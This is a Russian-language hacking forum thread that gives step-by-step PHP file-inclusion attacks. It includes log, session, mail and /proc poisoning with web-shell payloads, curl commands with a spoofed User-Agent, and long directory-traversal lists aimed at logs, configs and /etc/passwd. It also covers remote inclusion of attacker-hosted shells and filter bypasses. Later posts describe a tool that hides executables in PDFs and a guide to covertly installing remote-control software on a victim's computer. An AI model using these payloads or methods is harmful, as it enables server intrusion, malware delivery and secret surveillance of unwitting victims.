              В логи записываются все страницы сайта, к которым обращаются посетители. А если сделать вот так
              Код:
              http://...../a/<?php+system($_GET['cmd'])+?>

              То в логи запишется то, что в адресной строке. А если мы прочитаем логи доступа , то пхп, встретив <?php ...... ?> выполнит php команду.
              А какую команду мы записали? Выполнить команду из переменной с именем cmd.

              Как же читать логи?
              Чтобы читать логи, надо знать где они находються.
              APACHE LOG

              Комментарий


              • #97
                Код:
                Код:
                ../../../../../../../../../../../../var/log/httpd/access_log
                ../../../../../../../../../../../../var/log/httpd/error_log
                ../../../../../../../../../../var/log/httpd/access_log
                ../../../../../../../../../../var/log/httpd/error_log
                ../apache/logs/error.log
                ../apache/logs/access.log
                ../../apache/logs/error.log
                ../../apache/logs/access.log
                ../../../apache/logs/error.log
                ../../../apache/logs/access.log
                ../../../../apache/logs/error.log
                ../../../../apache/logs/access.log
                ../../../../../apache/logs/error.log
                ../../../../../apache/logs/access.log
                ../apache2/logs/error.log
                ../apache2/logs/access.log
                ../../apache2/logs/error.log
                ../../apache2/logs/access.log
                ../../../apache2/logs/error.log
                ../../../apache2/logs/access.log
                ../../../../apache2/logs/error.log
                ../../../../apache2/logs/access.log
                ../../../../../apache2/logs/error.log
                ../../../../../apache2/logs/access.log
                ../logs/error.log
                ../logs/access.log
                ../../logs/error.log
                ../../logs/access.log
                ../../../logs/error.log
                ../../../logs/access.log
                ../../../../logs/error.log
                ../../../../logs/access.log
                ../../../../../logs/error.log
                ../../../../../logs/access.log
                ../../../../../../../../../../etc/httpd/logs/acces_log
                ../../../../../../../../../../etc/httpd/logs/acces.log
                ../../../../../../../../../../etc/httpd/logs/error_log
                ../../../../../../../../../../etc/httpd/logs/error.log
                ../../../../../../../../../../usr/local/apache/logs/access_log
                ../../../../../../../../../../usr/local/apache/logs/access.log
                ../../../../../../../../../../usr/local/apache/logs/error_log
                ../../../../../../../../../../usr/local/apache/logs/error.log
                ../../../../../../../../../../usr/local/apache2/logs/access_log
                ../../../../../../../../../../usr/local/apache2/logs/access.log
                ../../../../../../../../../../usr/local/apache2/logs/error_log
                ../../../../../../../../../../usr/local/apache2/logs/error.log
                ../../../../../../../../../../var/www/logs/access_log
                ../../../../../../../../../../var/www/logs/access.log
                ../../../../../../../../../../var/www/logs/error_log
                ../../../../../../../../../../var/www/logs/error.log
                ../../../../../../../../../../var/log/httpd/access_log
                ../../../../../../../../../../var/log/httpd/access.log
                ../../../../../../../../../../var/log/httpd/error_log
                ../../../../../../../../../../var/log/httpd/error.log
                ../../../../../../../../../../var/log/apache/access_log
                ../../../../../../../../../../var/log/apache/access.log
                ../../../../../../../../../../var/log/apache/error_log
                ../../../../../../../../../../var/log/apache/error.log
                ../../../../../../../../../../var/log/apache2/access_log
                ../../../../../../../../../../var/log/apache2/access.log
                ../../../../../../../../../../var/log/apache2/error_log
                ../../../../../../../../../../var/log/apache2/error.log
                ../../../../../../../../../../var/log/access_log
                ../../../../../../../../../../var/log/access.log
                ../../../../../../../../../../var/log/error_log
                ../../../../../../../../../../var/log/error.log
                ../../../../../../../../../../opt/lampp/logs/access_log
                ../../../../../../../../../../opt/lampp/logs/error_log
                ../../../../../../../../../../opt/xampp/logs/access_log
                ../../../../../../../../../../opt/xampp/logs/error_log
                ../../../../../../../../../../opt/lampp/logs/access.log
                ../../../../../../../../../../opt/lampp/logs/error.log
                ../../../../../../../../../../opt/xampp/logs/access.log
                ../../../../../../../../../../opt/xampp/logs/error.log
                ../../../../../../../../../../Program Files\Apache Group\Apache\logs\access.log
                ../../../../../../../../../../Program Files\Apache Group\Apache\logs\error.log
                ../../../apache/logs/error.log
                ../../../apache/logs/access.log
                ../../../../apache/logs/error.log
                ../../../../apache/logs/access.log
                ../../../../../apache/logs/error.log
                ../../../../../apache/logs/access.log
                ../../../../../../apache/logs/error.log
                ../../../../../../apache/logs/access.log
                ../../../../../../../apache/logs/error.log
                ../../../../../../../apache/logs/access.log
                ../../../../../../../../apache/logs/error.log
                ../../../../../../../../apache/logs/access.log
                ../../../logs/error.log
                ../../../logs/access.log
                ../../../../logs/error.log
                ../../../../logs/access.log
                ../../../../../logs/error.log
                ../../../../../logs/access.log
                ../../../../../../logs/error.log
                ../../../../../../logs/access.log
                ../../../../../../../logs/error.log
                ../../../../../../../logs/access.log
                ../../../../../../../../logs/error.log
                ../../../../../../../../logs/access.log
                ../../../../../../../../../../../../etc/httpd/logs/acces_log
                ../../../../../../../../../../../../etc/httpd/logs/acces.log
                ../../../../../../../../../../../../etc/httpd/logs/error_log
                ../../../../../../../../../../../../etc/httpd/logs/error.log
                ../../../../../../../../../../../../var/www/logs/access_log
                ../../../../../../../../../../../../var/www/logs/access.log
                ../../../../../../../../../../../../usr/local/apache/logs/access_log
                ../../../../../../../../../../../../usr/local/apache/logs/access.log
                ../../../../../../../../../../../../var/log/apache/access_log
                ../../../../../../../../../../../../var/log/apache/access.log
                ../../../../../../../../../../../../var/log/access_log
                ../../../../../../../../../../../../var/www/logs/error_log
                ../../../../../../../../../../../../var/www/logs/error.log
                ../../../../../../../../../../../../usr/local/apache/logs/error_log
                ../../../../../../../../../../../../usr/local/apache/logs/error.log
                ../../../../../../../../../../../../var/log/apache/error_log
                ../../../../../../../../../../../../var/log/apache/error.log
                ../../../../../../../../../../../../var/log/access_log
                ../../../../../../../../../../../../var/log/error_log

                Комментарий


                • #98
                  Код:
                  Код:
                  ../../../../../../usr/local/apache/conf/httpd.conf
                  ../../../../../../usr/local/apache2/conf/httpd.conf
                  ../../../../../../etc/httpd/conf/httpd.conf
                  ../../../../../../etc/apache/conf/httpd.conf
                  ../../../../../../usr/local/etc/apache/conf/httpd.conf
                  ../../../../../../etc/apache2/httpd.conf
                  ../../../../../../../../../usr/local/apache/conf/httpd.conf
                  ../../../../../../../../../usr/local/apache2/conf/httpd.conf
                  ../../../../../../../../usr/local/apache/httpd.conf
                  ../../../../../../../../usr/local/apache2/httpd.conf
                  ../../../../../../../../usr/local/httpd/conf/httpd.conf
                  ../../../../../../../usr/local/etc/apache/conf/httpd.conf
                  ../../../../../../../usr/local/etc/apache2/conf/httpd.conf
                  ../../../../../../../usr/local/etc/httpd/conf/httpd.conf
                  ../../../../../../../usr/apache2/conf/httpd.conf
                  ../../../../../../../usr/apache/conf/httpd.conf
                  ../../../../../../../usr/local/apps/apache2/conf/httpd.conf
                  ../../../../../../../usr/local/apps/apache/conf/httpd.conf
                  ../../../../../../etc/apache/conf/httpd.conf
                  ../../../../../../etc/apache2/conf/httpd.conf
                  ../../../../../../etc/httpd/conf/httpd.conf
                  ../../../../../../etc/http/conf/httpd.conf
                  ../../../../../../etc/apache2/httpd.conf
                  ../../../../../../etc/httpd/httpd.conf
                  ../../../../../../etc/http/httpd.conf
                  ../../../../../../etc/httpd.conf
                  ../../../../../opt/apache/conf/httpd.conf
                  ../../../../../opt/apache2/conf/httpd.conf
                  ../../../../var/www/conf/httpd.conf
                  ../../../private/etc/httpd/httpd.conf
                  ../../../private/etc/httpd/httpd.conf.default
                  ../../Volumes/webBackup/opt/apache2/conf/httpd.conf
                  ../../Volumes/webBackup/private/etc/httpd/httpd.conf
                  ../../Volumes/webBackup/private/etc/httpd/httpd.conf.default
                  ../../../../../../../../../Program Files\Apache Group\Apache\conf\httpd.conf
                  ../../../../../../../../../Program Files\Apache Group\Apache2\conf\httpd.conf
                  ../../../../../../../../../Program Files\xampp\apache\conf\httpd.conf
                  ../../../../../../../../../usr/local/php/httpd.conf.php
                  ../../../../../../../../../usr/local/php4/httpd.conf.php
                  ../../../../../../../../../usr/local/php5/httpd.conf.php
                  ../../../../../../../../../usr/local/php/httpd.conf
                  ../../../../../../../../../usr/local/php4/httpd.conf
                  ../../../../../../../../../usr/local/php5/httpd.conf
                  ../../../../../../../../../Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
                  ../../../../../../../../../Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
                  ../../../../../../../../../Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
                  ../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
                  ../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
                  ../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php

                  Комментарий


                  • #99
                    Можно найти php.ini
                    Код:
                    Код:
                    ../../../../../../../../../etc/php.ini
                    ../../../../../../../../../bin/php.ini
                    ../../../../../../../../../etc/httpd/php.ini
                    ../../../../../../../../../usr/lib/php.ini
                    ../../../../../../../../../usr/lib/php/php.ini
                    ../../../../../../../../../usr/local/etc/php.ini
                    ../../../../../../../../../usr/local/lib/php.ini
                    ../../../../../../../../../usr/local/php/lib/php.ini
                    ../../../../../../../../../usr/local/php4/lib/php.ini
                    ../../../../../../../../../usr/local/php5/lib/php.ini
                    ../../../../../../../../../usr/local/apache/conf/php.ini
                    ../../../../../../../../../etc/php4.4/fcgi/php.ini
                    ../../../../../../../../../etc/php4/apache/php.ini
                    ../../../../../../../../../etc/php4/apache2/php.ini
                    ../../../../../../../../../etc/php5/apache/php.ini
                    ../../../../../../../../../etc/php5/apache2/php.ini
                    ../../../../../../../../../etc/php/php.ini
                    ../../../../../../../../../etc/php/php4/php.ini
                    ../../../../../../../../../etc/php/apache/php.ini
                    ../../../../../../../../../etc/php/apache2/php.ini
                    ../../../../../../../../../web/conf/php.ini
                    ../../../../../../../../../usr/local/Zend/etc/php.ini
                    ../../../../../../../../../opt/xampp/etc/php.ini
                    ../../../../../../../../../var/local/www/conf/php.ini
                    ../../../../../../../../../etc/php/cgi/php.ini
                    ../../../../../../../../../etc/php4/cgi/php.ini
                    ../../../../../../../../../etc/php5/cgi/php.ini
                    ../../../../../../../../../php5\php.ini
                    ../../../../../../../../../php4\php.ini
                    ../../../../../../../../../php\php.ini
                    ../../../../../../../../../PHP\php.ini
                    ../../../../../../../../../WINDOWS\php.ini
                    ../../../../../../../../../WINNT\php.ini
                    ../../../../../../../../../apache\php\php.ini
                    ../../../../../../../../../xampp\apache\bin\php.ini
                    ../../../../../../../../../NetServer\bin\stable\apache\php.ini
                    ../../../../../../../../../home2\bin\stable\apache\php.ini
                    ../../../../../../../../../home\bin\stable\apache\php.ini
                    ../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
                    Другие логи:
                    Код:
                    Код:
                    Cpanel:
                    *log
                    /usr/local/cpanel/logs
                    /usr/local/cpanel/logs/stats_log
                    /usr/local/cpanel/logs/access_log
                    /usr/local/cpanel/logs/error_log
                    /usr/local/cpanel/logs/license_log
                    /usr/local/cpanel/logs/login_log
                    /usr/local/cpanel/logs/stats_log
                    *conf
                    /var/cpanel/cpanel.config
                    
                    MySQL:
                    *log
                    /var/log/mysql/mysql-bin.log
                    /var/log/mysql.log
                    /var/log/mysqlderror.log
                    /var/log/mysql/mysql.log
                    /var/log/mysql/mysql-slow.log
                    /var/mysql.log
                    *conf
                    /var/lib/mysql/my.cnf
                    /etc/mysql/my.cnf
                    /etc/my.cnf
                    
                    
                    ProFTPD:
                    *log
                    /etc/logrotate.d/proftpd
                    /www/logs/proftpd.system.log
                    /var/log/proftpd
                    *conf
                    /etc/proftp.conf
                    /etc/protpd/proftpd.conf
                    /etc/vhcs2/proftpd/proftpd.conf
                    /etc/proftpd/modules.conf
                    
                    vsftpd:
                    *log
                    /var/log/vsftpd.log
                    /etc/vsftpd.chroot_list
                    /etc/logrotate.d/vsftpd.log
                    *conf
                    /etc/vsftpd/vsftpd.conf
                    /etc/vsftpd.conf
                    /etc/chrootUsers
                    
                    wu-ftpd:
                    *log
                    /var/log/xferlog
                    /var/adm/log/xferlog
                    *conf
                    /etc/wu-ftpd/ftpaccess
                    /etc/wu-ftpd/ftphosts
                    /etc/wu-ftpd/ftpusers
                    
                    Pure-FTPd:
                    *conf
                    /usr/sbin/pure-config.pl
                    /usr/etc/pure-ftpd.conf
                    /etc/pure-ftpd/pure-ftpd.conf
                    /usr/local/etc/pure-ftpd.conf
                    /usr/local/etc/pureftpd.pdb
                    /usr/local/pureftpd/etc/pureftpd.pdb
                    /usr/local/pureftpd/sbin/pure-config.pl
                    /usr/local/pureftpd/etc/pure-ftpd.conf
                    -/etc/pure-ftpd.conf
                    /etc/pure-ftpd/pure-ftpd.pdb
                    /etc/pureftpd.pdb
                    /etc/pureftpd.passwd
                    /etc/pure-ftpd/pureftpd.pdb
                    DragonflyBSD & FreeBSD: /usr/ports/ftp/pure-ftpd/
                    OpenBSD: /usr/ports/net/pure-ftpd/
                    NetBSD: /usr/pkgsrc/net/pureftpd/
                    Crux Linux: /usr/ports/contrib/pure-ftpd/
                    *log
                    /var/log/pure-ftpd/pure-ftpd.log
                    /logs/pure-ftpd.log
                    /var/log/pureftpd.log
                    
                    Other:
                    /var/log/ftp-proxy/ftp-proxy.log
                    /var/log/ftp-proxy
                    /var/log/ftplog
                    /etc/logrotate.d/ftp
                    /etc/ftpchroot
                    /etc/ftphosts

                    Комментарий


                    • Но если логи найти не удается, можно их найти через /proc/
                      В ОС Linux виртуальная файловая система /proc содержит файлы с текущей информацией о процессах и системе в целом. Файловая система создается в оперативной памяти компьютера в процессе загрузки и используется в качестве интерфейса обмена данными со структурами ядра. Использование файлов /proc/* в большинстве случаев позволяет избавиться от необходимости чтения и записи в устройство /dev/kmem. Большинство расположенных в структуре /proc файлов доступны пользователям только для чтения, а для записи требуют полномочий root. Файловая система /proc содержит множество каталогов с численными именами – эти каталоги создаются для каждого запущенного в системе процесса. Имя каталога определяется идентификатором (PID) соответствующего процесса. Каждый из таких каталогов содержит ряд подкаталогов файлов. Но этот каталог не всегда доступен для чтения.


                      Воспользуемся для наглядности curlом

                      Код:
                      curl "http://........../?page=../../../../../../../../proc/self/fd/2&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"
                      ../../../../proc/ - Каталог, в котором храниться информация о
                      ../../../../proc/self/ - ссылка на текущий процесс
                      ../../../../proc/self/fd/ - подкаталог, содержащий по одной символьной ссылке для каждого открытого процессом файла. Имя ссылки соответствует номеру файлового дескриптора для открытого файла, а сама ссылка указывает на открытый процессом файл.


                      Символьные ссылки в подкаталоге fd позволяют обманывать программы, которые в качестве входного файла не принимают stdin или в качестве выходного – stdout. В командной строке такой программы можно просто указывать /proc/self/fd/0 в качестве входного файла и в качестве выходного /proc/self/fd/1. Отметим, что предложенная хитрость не сработает для программ, использующих при файловых операциях команду seek, поскольку такие операции не поддерживаются для файлов стандартного ввода-вывода.

                      Файлы /proc/self/fd/N в Linux – это почти то же самое, что и файлы /dev/fd/N. Фактически, большинство сценариев MAKEDEV в Linux делает символьные ссылки /dev/fd на /proc/self/fd.


                      Код:
                      /proc/self/fd/0
                      /proc/self/fd/1
                      ....................

                      "User-Agent: <?php eval(\$_GET[cmd]); ?>" - Подделываем юзерагент. В лог апача запишется юзерагнет и выполниться G_GET['cmd']

                      Пробуем подставлять разные цифры вместо N
                      Код:
                      curl "http://........../?page=../../../../../../../../proc/self/fd/N&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"
                      Код:
                      curl "http://........../?page=../../../../../../../../proc/self/fd/0&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"
                      Код:
                      curl "http://........../?page=../../../../../../../../proc/self/fd/1&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"
                      Код:
                      curl "http://........../?page=../../../../../../../../proc/self/fd/2&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"
                      Код:
                      curl "http://........../?page=../../../../../../../../proc/self/fd/2..&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"

                      Допустим ссылка на лог апача (не важно аксес лог или ерор лог) это /proc/self/fd/3
                      Мы передаем юзерагент <?php eval(\$_GET[cmd]); ?> что означает выполнить пхп код, который в переменной $_GET[cmd] А в #_GET[cmd] мы передаем команду phpinfo();
                      Юзерагент запишется в лог апача, и выполниться, на экране мы увидим результат выполнения команды.


                      Еще один способ инклуда с /proc


                      /proc/self/environ - хранит переменной окружение. Опять же можно подделать юзерагнет.
                      Код:
                      curl "http://site.com/index.php?page=../../../../../../../../proc/self/environ&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"




                      Мылим мыло
                      На многих сайтах есть регистрация. При регистрации указываем мыло вида NAME@localhost
                      где NAME - имя, под которым запущен веб сервер.
                      Высылаем себе письмо (забыли пароль/регистрируемся/...)
                      Нам нужно каким-то образом внедрить пхп код в тело письма. Это может быть ник или что-то еще
                      <?php eval($_GET[cmd]); ?>
                      Отправленное письмо будет лежать в /var/mail/NAME
                      Код:
                      http://....../index.php?page=../../....d&cmd=phpinfo()

                      Также можно много полезного узнать из
                      /proc/mounts
                      /proc/cpuinfo
                      /proc/self/loginuid
                      /etc/hosts

                      Протокол DATA
                      Протокол data включен ОЧЕНЬ редко! Почти никогда.
                      Для начало изучи немного RFC 2397
                      Условие:
                      allow_url_include = ON
                      Код:
                      http://.............../?page=data:,<?php eval($_REQUEST[cmd]); ?>&cmd=phpinfo();
                      Если же присутствуют какие-либо фильтры то можно закодировать в base64

                      Код:
                      http://................/?dir=data:;base64, PD9waHAgZXZhbCgkX1JFUVVFU1RbY21kXSk7ID8+&cmd=phpinfo();

                      Комментарий


                      • Очень часто можно приинклудить свою сессию.
                        Смысл:
                        пхп скрипт работает с сессиями и пишет например в них рефер или юзерагент.
                        ОБратимся к сайту с юзерагентом и рефером вида "<?php system($_GET['a']) ?>".
                        Допустим пхп скрипт записал это в нашу сессию.
                        Сессиии храняться в катологе temp и имеют префикс sess_
                        Узнаем имя своей сесии из куков.
                        обращаемся к скрипту так:
                        Код:
                        http://..............index.php?file=...�Й_СЕСИИ
                        http://..............index.php?file=...c4a598c81&a=ls
                        Сессия это просто текстовый файл, в который пишутся данные.
                        Пхп скрипт, найдя дескрипторы <?php и ?> интерпретирует в них команды.








                        Можно каким-либо образом загрузить файл на сайт, а потом его приинклудить и он выполниться. Например сайт какой-то фотогаллерии. Загружаем картинку (аву или ченить наподобие), предварительно подправив сорец картинки (вписав <?php system($_GET['cmd']) ?>). Картинку загрузили, посмотрели её адрес и пробуем инклудить...
                        Код:
                        http://....../index.php?file=images/...454.jpg?cmd=ls
                        и видим список файлов и папок в текущей директории.


                        2. Можно приинклудить файлы которые находятся на других сайтах.
                        Условие:
                        Код:
                        ; PHP.INI
                        allow_url_fopen = ON
                        allow_url_include = ON
                        Создаем сайт на каком-нибудь бесплатном хостинге, например narod.ru.
                        Загружаем текстовый файл с текстом <?php system($_GET['cmd']); ?> а можно и записать в текстовик полноценный код шелла (r57,c99 итд).
                        Загрузили с именем a.txt предположим.
                        Идем на бажный сайтец с такими параметрами
                        Код:
                        http://......./index.php?file=http:/...u/a.txt&cmd=ls
                        Еcли же у нас
                        Код:
                        include("$_GET['razdel']/default/index.php");
                        то на своем хостинге создаем папку /default/index.php . Но нам надо чтобы пхп не интерпретировался на нашем хостинге, тоесть при обращении к index.php был
                        Код:
                        http://.............index.php?razdel...hsajt.narod.ru
                        Получиться
                        Код:
                        include("http://nashsajt.narod.ru/default/index.php");


                        Бывает например вот так
                        Код:
                        Include("images/$_GET['file'].jpg");
                        Тоесть нам мешается расширение jpg. Отсечь его можно вот так:
                        Код:
                        htp://........index.php?file=../../etc/passwd%00

                        Что такое %00 ?
                        Нуллбайт - пустой символ. Т.к. пхп написан на с++, а в с++ нуллбайт означает конец текстовой строки, поэтому в строчке lalala%00fffff пхп увидит только lalala

                        Сейчас редко где прокатывает нуллбайт. Но есть альтернатива:

                        Для WIN универсальный символ для последовательности в векторе атаки это точка (.);
                        минимальная универсальная длина этой последовательности - 266 символов

                        в *nix единственным и универсальным символом является слэш (/);
                        минимальная универсальная длина последовательности - 4095 символов;
                        Код:
                        http://...../test.php?lol=inc.php.......................
                        Код:
                        http://localhost/test.php?lol=inc.ph...//////////////
                        Более детальная информация об альтернативе нулл байта - Форум АНТИЧАТ - [новый способ] замена нулл-байту в инклудах



                        Иногда в скрипах делают фильтры , которые режут ../
                        Код:
                        <?php
                        str_replace('../','',$_GET['inc']);
                        ?>
                        Обходится элементарно:

                        Код:
                        http://...../?inc=....//....//a.php

                        Комментарий


                        • Double VPN своими руками

                          На сегоднешний день каждый,те кто не первый день в бизе, каждый заботится о своей анонимности. И как не странно, на сегоднешний день нет доверия к различным VPN провайдерам, подозрение о том что они видут логи заставляют вас менять свои VPN сервера, найден выход. VipVPN GUI Client поможет вам соеденить несколько Single VPN серверов что обеспечит вам более надежную анонимность в сети. Вам потребуется поставить конфиги и ключи от одного VPN в "program files/vipvpn/config" и от другого VPN в "program files/vipvpn/config/double"
                          И один впн заработает через второй !
                          Так же клиент поддерживает Double VPN сщеденение.
                          И в режиме реального времени вы сможете просматривать ваш IP адресс.

                          Описание клиента:
                          VipVPN GUI Client
                          VipVPN GUI Client это замечательный клиент для подключения через ваш VPN сервер.
                          Имеется возможность создание цепочек из Single VPN серверов.
                          Проверка вашего IP теперь возможна через клиент!
                          При помощи VipVPN GUI Client вы обеспечите себе более надежную анонимность!



                          Функции:
                          -AutoRoute Checker. Fixes Important Routing Bugs. Other VPN Clients can show that you are connected, but your connection is totally unsecured.
                          -Exclude List for Other VPN's or Double VPN Systems
                          -AutoRun
                          -AutoConnect / Expiration Date Reminder



                          Программа полностью бесплатана.


                          Скачать с сайта разработчика VipVPN GUI Client


                          Сайт разработчика vipvpn.com

                          Комментарий


                          • Склеиваем PDF c EXE (by d_x & Kaimi)

                            В начале года несколькими людьми была найдена "уязвимость" в формате PDF, позволяющая запускать произвольный код при открытии файла, которая на самом деле является документированной возможностью формата. Всего было опубликовано два типа уязвимостей: с использованием и без использования JavaScript.
                            После беглого изучения формата и специфики этой проблемы была реализована программа для внедрения exe файлов в тело pdf и последующего запуска exe при открытии. Конечно, при открытии pdf выдается предупреждение:


                            Однако, существует возможность вывести произвольный текст в окне предупреждения (актуально для Acrobat Reader 9.*, в 8.* весь внедренный код вываливается целиком, и пользователь, скорее всего, что-нибудь заподозрит).

                            Программа обладает следующими возможностями:

                            *Задание произвольного текста сообщение (лучше не делать текст длинным)
                            *Задание имени временного vbs файла (используется для создания exe файла из тела pdf)
                            *Задание имени временного exe
                            *Возможность удаления exe через заданный интервал времени

                            Интерфейс программы предельно прост и выглядит следующим образом:



                            Download



                            ===== Как это работает? =====


                            Программа открывает заданный PDF-документ и ищет в нем максимальное значение номера объекта. После этого создается собственный объект с командой запуска, и его выполнение указывается в корневом объекте PDF, т.е запуск происходит сразу после открытия документа.

                            Было много проблем плана "а как же спрятать exe?". Алгоритм таков: если пользователь разрешает запуск объекта, открывается cmd.exe, создающая небольшой vbscript-сценарий.

                            Этот сценарий запускается и начинает искать в текущей директории pdf-документ с самой последней датой изменения (очевидно, это будет наш коварный pdf). Сценарий открывает этот файл и считывает из него заданный диапазон байтов (это второй vbs-файл, спрятанный в конец pdf-документа) и записывает его в виде нового vbscript-сценария, после чего запускает. На этом работа первого сценария завершена.

                            Второй сценарий содержит тело exe-файла, запакованное в массив байтов. Сценарий из массива создает exe-файл и запускает его, после чего удаляет себя и первый сценарий. Если была задана опция удаления exe, то сценарий ждет заданное время и пытается удалить также созданный exe-файл.

                            Окно командной строки при всех этих манипуляциях появляется всего на пару секунд.

                            Такой подход позволяет спрятать в pdf-документе exe-файл любого размера и за несколько секунд запустить его.

                            Комментарий


                            • Remote Office Manager - конкурент RAdmin'a

                              Предисловие:
                              Недавно мне понадобилось найти прогу для незаметного проникновения на чужой комп и ... много чего дальше..) Как раз нашел Radmin'a. На первый взгляд - то, что надо! Но вот облом, если радмин за NAT-ом, то к нему не приконектишься(. + В каждый раз необходимо пробивать IP жертвы. Это стало проблемой, над которой мне не захотелось долго сидеть. Проведя несколько минут в поисках аналога Радмина я нашел ROM. Использую версию 4.0.1.
                              Набор встроенных утилит (Viever) :

                              * Просмотр.
                              * Управление.
                              * Удаленный диспетчер задач.
                              * Файловый менеджер.
                              * Управление питанием.
                              * Перехват оверлейного видео.
                              * Перехват звука.
                              * Удаленный запуск программ.
                              * Терминал.
                              * Диспетчер устройств.
                              * Текстовое сообщение.
                              * Чат.
                              * Запись экрана.

                              Настройки (Server) :

                              * Автозапуск Вкл/Выкл.
                              * Отображение иконки в трее.
                              * Пароль и др...
                              * "Обратное соединение" (callback)

                              Офф. сайт -> Общее описание
                              Скачать клиент+сервер можно здесь

                              Установка:
                              Итак, как говорится в великом help'e, для установки вручную нам потребуются файлы:

                              * AledensoftIpcServer.dll
                              * HookDrv.dll
                              * ROMFUSClient.exe
                              * ROMServer.exe
                              * ROMwln.dll

                              Общий размер файлов - 4,1 МБ

                              Эти файлы кидаем в любую папку. Не имеет значения, в какой папке будет установлен ROM.

                              Дальше надо создать создать *.reg файл в котором будут все необходимые настройки сервера.
                              Для этого устанавливаем ROMServer инсталлятором, делаем все необходимые установки. Главное не забыть про автозапуск, отображение в трее, Обратное соединение ну и пароль)

                              Если у Вас динамичесский IP, то зарегистрируйте себе на DynDns.com бесплатный домен и скачайте клиент для обновления IP, привязанного к Вашему домену.
                              В настройках Обратного cоединения ROMServer'a надо ввести Ваш IP или зарегистрированный Вами домен на DynDns.
                              Когда закончили с настройками сервера, Запустите стандартный редактор реестра Windows (c:\windows\regedit.exe). Экспортируйте раздел реестра
                              KEY_LOCAL_MACHINE\SYSTEM\Remote Office Manager\v3.4\Server\Parameters в файл, например, settings.reg.
                              Для того, чтобы принимать входящие соединения в настройках ROM-Viewer необходимо включить соответствующую опцию. Откройте окно настроек ROM-Viewer ("Инструменты -> Настройки"). В появившемся окне перейдите во вкладку "Обратное соединение". Установите флажок "Разрешить входящие соединения".

                              Впринципе всё. Вот я склепал скриптик для установки сервера. Изменяйте его, как Вам хочется. Он в архиве с видео.

                              В итоге:
                              Однажды установив сервер на компе жертвы, ROMServer просится подключиться к Вашему Viewer'u при каждой перезагрузке компьютера ( Вашего/Жертвы )

                              Примечания:


                              Параметры запуска ROMServer.exe

                              * /silentinstall — установить службу.
                              * /silentuninstall — деинсталлировать службу.
                              * /firewall — интегрировать с системным файрволлом Windows XP/Vista.
                              * /start — запустить сервер.
                              * /stop — остановить сервер.
                              * /config — открыть окно настроек.


                              Внимательно читайте Help!

                              И ещё) не забудьте открыть у себя нужные порты (по умолчанию 5650 и 5651) , если они за NAT-ом.

                              Комментарий

                              Обработка...
                              X